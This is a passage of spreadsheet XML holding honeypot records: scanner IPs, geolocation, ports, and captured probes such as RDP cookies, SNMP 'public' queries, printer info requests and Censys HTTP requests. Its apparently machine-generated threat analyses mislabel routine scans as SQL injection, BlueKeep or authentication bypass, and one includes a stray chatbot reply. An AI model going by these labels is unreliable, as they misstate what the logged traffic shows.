amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_NTP_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_FTP_H14&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_RDP_H31&amp;&amp;SMA-LAB_SNMP_H30&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_SIP_H44&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_SNMP_H8&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_IMAP_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1521&amp;&amp;5432&amp;&amp;161&amp;&amp;1433&amp;&amp;1080&amp;&amp;20836&amp;&amp;110&amp;&amp;389&amp;&amp;3389&amp;&amp;23&amp;&amp;51701&amp;&amp;3306&amp;&amp;6667&amp;&amp;5900&amp;&amp;NA&amp;&amp;445&amp;&amp;6379&amp;&amp;9100&amp;&amp;50631&amp;&amp;53368&amp;&amp;50434&amp;&amp;143&amp;&amp;21&amp;&amp;52552&amp;&amp;80&amp;&amp;56024&amp;&amp;56325&amp;&amp;57646&amp;&amp;54699&amp;&amp;54763&amp;&amp;56204&amp;&amp;52390&amp;&amp;443&amp;&amp;56263&amp;&amp;53217&amp;&amp;54942</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'singular.ttk.pte.hu': ['unknown']}</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;request&amp;&amp;NA&amp;&amp;query&amp;&amp;stshash&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SIP:{'accept': 'text/plain', 'call-id': '8494217352@10.128.0.54', 'contact': 'sip:cUBYlaXq@10.128.0.54:50885', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:RwwWsSjx@10.128.0.54:50885;tag=22169567', 'max-forwards': '20', 'to': 'sip:gvovqMnS@203.29.241.98', 'user-agent': 'vFesjjmE', 'via': 'SIP/2.0/UDP 10.128.0.54:50885;branch=diXcCt.6324361511;received=205.210.31.54;rport;alias'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YpPkaPzia'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=QdBiha'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ErjolK'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,59962)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,59964)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,59978)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,60220)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,60228)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,60236)}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,63212)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,63214)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,64442)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,64454)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,64460)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hdpNTYmno'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HdgxZJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vAxGwY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gPTZcXXxV'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yMXEgF'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NBkYkT'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,57940)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,57946)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.54,57960)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pYGKambVl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CJuBip'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HhzXcL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YXCaokBHn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pfgBCP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DXBqwo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cRrUQFrFC'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f36</t>
  </si>
  <si>
    <t>The data suggests an attempt to access Microsoft SQL Server, which could be a sign of malicious activity related to database exploitation or unauthorized access. This may involve attempts to inject SQL code or steal sensitive information from the database server. It's a potential indication of a hacking incident. &amp;&amp; This indicates potential SIP flood or scanning activity, where an attacker is sending excessive or unauthorized requests to a service for malicious purposes such as denial of service or reconnaissance. &amp;&amp; There is insufficient log data to analyze any potential malicious activity. The provided information does not provide any insight into possible attacks or suspicious behavior. Further data would be needed to assess the situation accurately. &amp;&amp; The data suggests an attempt to access sensitive database credentials, possibly through brute-force or probing methods. This could be part of a larger attack to gain unauthorized access to the system's databases. &amp;&amp; No activity detected, SIP service appears inactive or unavailable, potential indication of network congestion or configuration issue. 
Service is either down or inaccessible to clients. 
No malicious activity reported from this source so far. &amp;&amp; An attacker is attempting to determine what capabilities are supported by a service, likely in preparation for exploiting or manipulating it. This could be part of a reconnaissance phase before launching further attacks. It may also indicate an attempt to gather information about the system's configuration. &amp;&amp; This log entry indicates a potential brute-force attack on an RDP service, with an attacker attempting to bypass authentication by manipulating the session hash. The modified hash is likely being used to trick the system into authenticating the attacker without proper credentials. This is a common tactic in RDP exploitation. &amp;&amp; Possible malicious activity: Unauthorized access to Remote Desktop service, potential brute-force attack attempt with suspicious hash value "cRrUQFrFC" in a cookie. Cookie-based authentication is unusual for RDP services. Malicious actor may be attempting to bypass login mechanisms.</t>
  </si>
  <si>
    <t>NTP Spoofing &amp;&amp; SQL Injection &amp;&amp; PortScan &amp;&amp; I don't see any log data provided. Please provide the actual log data so I can help analyze it and identify the type of attacks mentioned. &amp;&amp; Port Scan &amp;&amp; Blind RDP &amp;&amp; BlueKeep Attack</t>
  </si>
  <si>
    <t>ef3aebf758d2d6d437870cc8bbc5dd3c</t>
  </si>
  <si>
    <t>121.179.63.71</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>Gwangju (Wolchul-dong)</t>
  </si>
  <si>
    <t>1841811</t>
  </si>
  <si>
    <t>35.2403</t>
  </si>
  <si>
    <t>126.869</t>
  </si>
  <si>
    <t>hanguggwanggisulwon</t>
  </si>
  <si>
    <t>2006-11-01</t>
  </si>
  <si>
    <t>::ffff:79b3:3f47</t>
  </si>
  <si>
    <t>97e13cf804a1c8ec8cccca9d82b7ae83</t>
  </si>
  <si>
    <t>117.206.130.56</t>
  </si>
  <si>
    <t>::ffff:75ce:8238</t>
  </si>
  <si>
    <t>48200073bc541ba81a9098c9dbafce3d</t>
  </si>
  <si>
    <t>162.142.125.213</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;SIP Endpoint Enumeration&amp;&amp;Encryption Misuse&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Credential_Stuffing_Attack_High</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_FTP_H3&amp;&amp;SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_SIP_H36&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_FTP_H37&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_IPP_H33&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_IPP_H28&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_IRC_H19&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_IRC_H33&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_POSTGRES_H39&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_IRC_H26&amp;&amp;SMA-LAB_IRC_H23&amp;&amp;SMA-LAB_FTP_H41&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_ORACLE_H24&amp;&amp;SMA-LAB_ORACLE_H34&amp;&amp;SMA-LAB_IRC_H37&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_IPP_H22&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_LDAP_H14&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_RDP_H23&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_POP3_H47&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_RDP_H5&amp;&amp;SMA-LAB_IPP_H35&amp;&amp;SMA-LAB_ORACLE_H33&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_IPP_H40&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_MYSQL_H24&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_HTTP_H28&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SIP_H15&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_POP3_H40&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_IPP_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_SIP_H9&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_POP3_H20&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_IPP_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1521&amp;&amp;80&amp;&amp;143&amp;&amp;6379&amp;&amp;NA&amp;&amp;445&amp;&amp;631&amp;&amp;3389&amp;&amp;3306&amp;&amp;5432&amp;&amp;35632&amp;&amp;25&amp;&amp;443&amp;&amp;4775&amp;&amp;6667&amp;&amp;1080&amp;&amp;1433&amp;&amp;110&amp;&amp;5900&amp;&amp;49534&amp;&amp;48075&amp;&amp;23&amp;&amp;21&amp;&amp;389&amp;&amp;9100&amp;&amp;47746&amp;&amp;50270&amp;&amp;37004&amp;&amp;36940&amp;&amp;43206&amp;&amp;41984&amp;&amp;54152&amp;&amp;58420</t>
  </si>
  <si>
    <t>MI</t>
  </si>
  <si>
    <t>Michigan</t>
  </si>
  <si>
    <t>Washtenaw</t>
  </si>
  <si>
    <t>Ann Arbor (Old West Side)</t>
  </si>
  <si>
    <t>4984247</t>
  </si>
  <si>
    <t>48104</t>
  </si>
  <si>
    <t>42.2809</t>
  </si>
  <si>
    <t>-83.7489</t>
  </si>
  <si>
    <t>398324</t>
  </si>
  <si>
    <t>Censys, Inc.</t>
  </si>
  <si>
    <t>Censys Inc</t>
  </si>
  <si>
    <t>CENSY</t>
  </si>
  <si>
    <t>2024-03-29</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;command&amp;&amp;stshash&amp;&amp;query&amp;&amp;request&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IRC:{'command': '*IDN?', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_HTTPS:{'Host': '156.244.37.11:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,59602)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '95.164.21.98:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.90.63.129:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.138.110', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=48795'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '156.244.8.69:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://156.244.8.69:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '38.54.115.66:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.54.115.66:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Host': '94.131.97.67:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,55382)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.233.76.135:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.253.40.123', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.26.156.60:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.26.156.60:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,50604)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=38695'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=53912'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 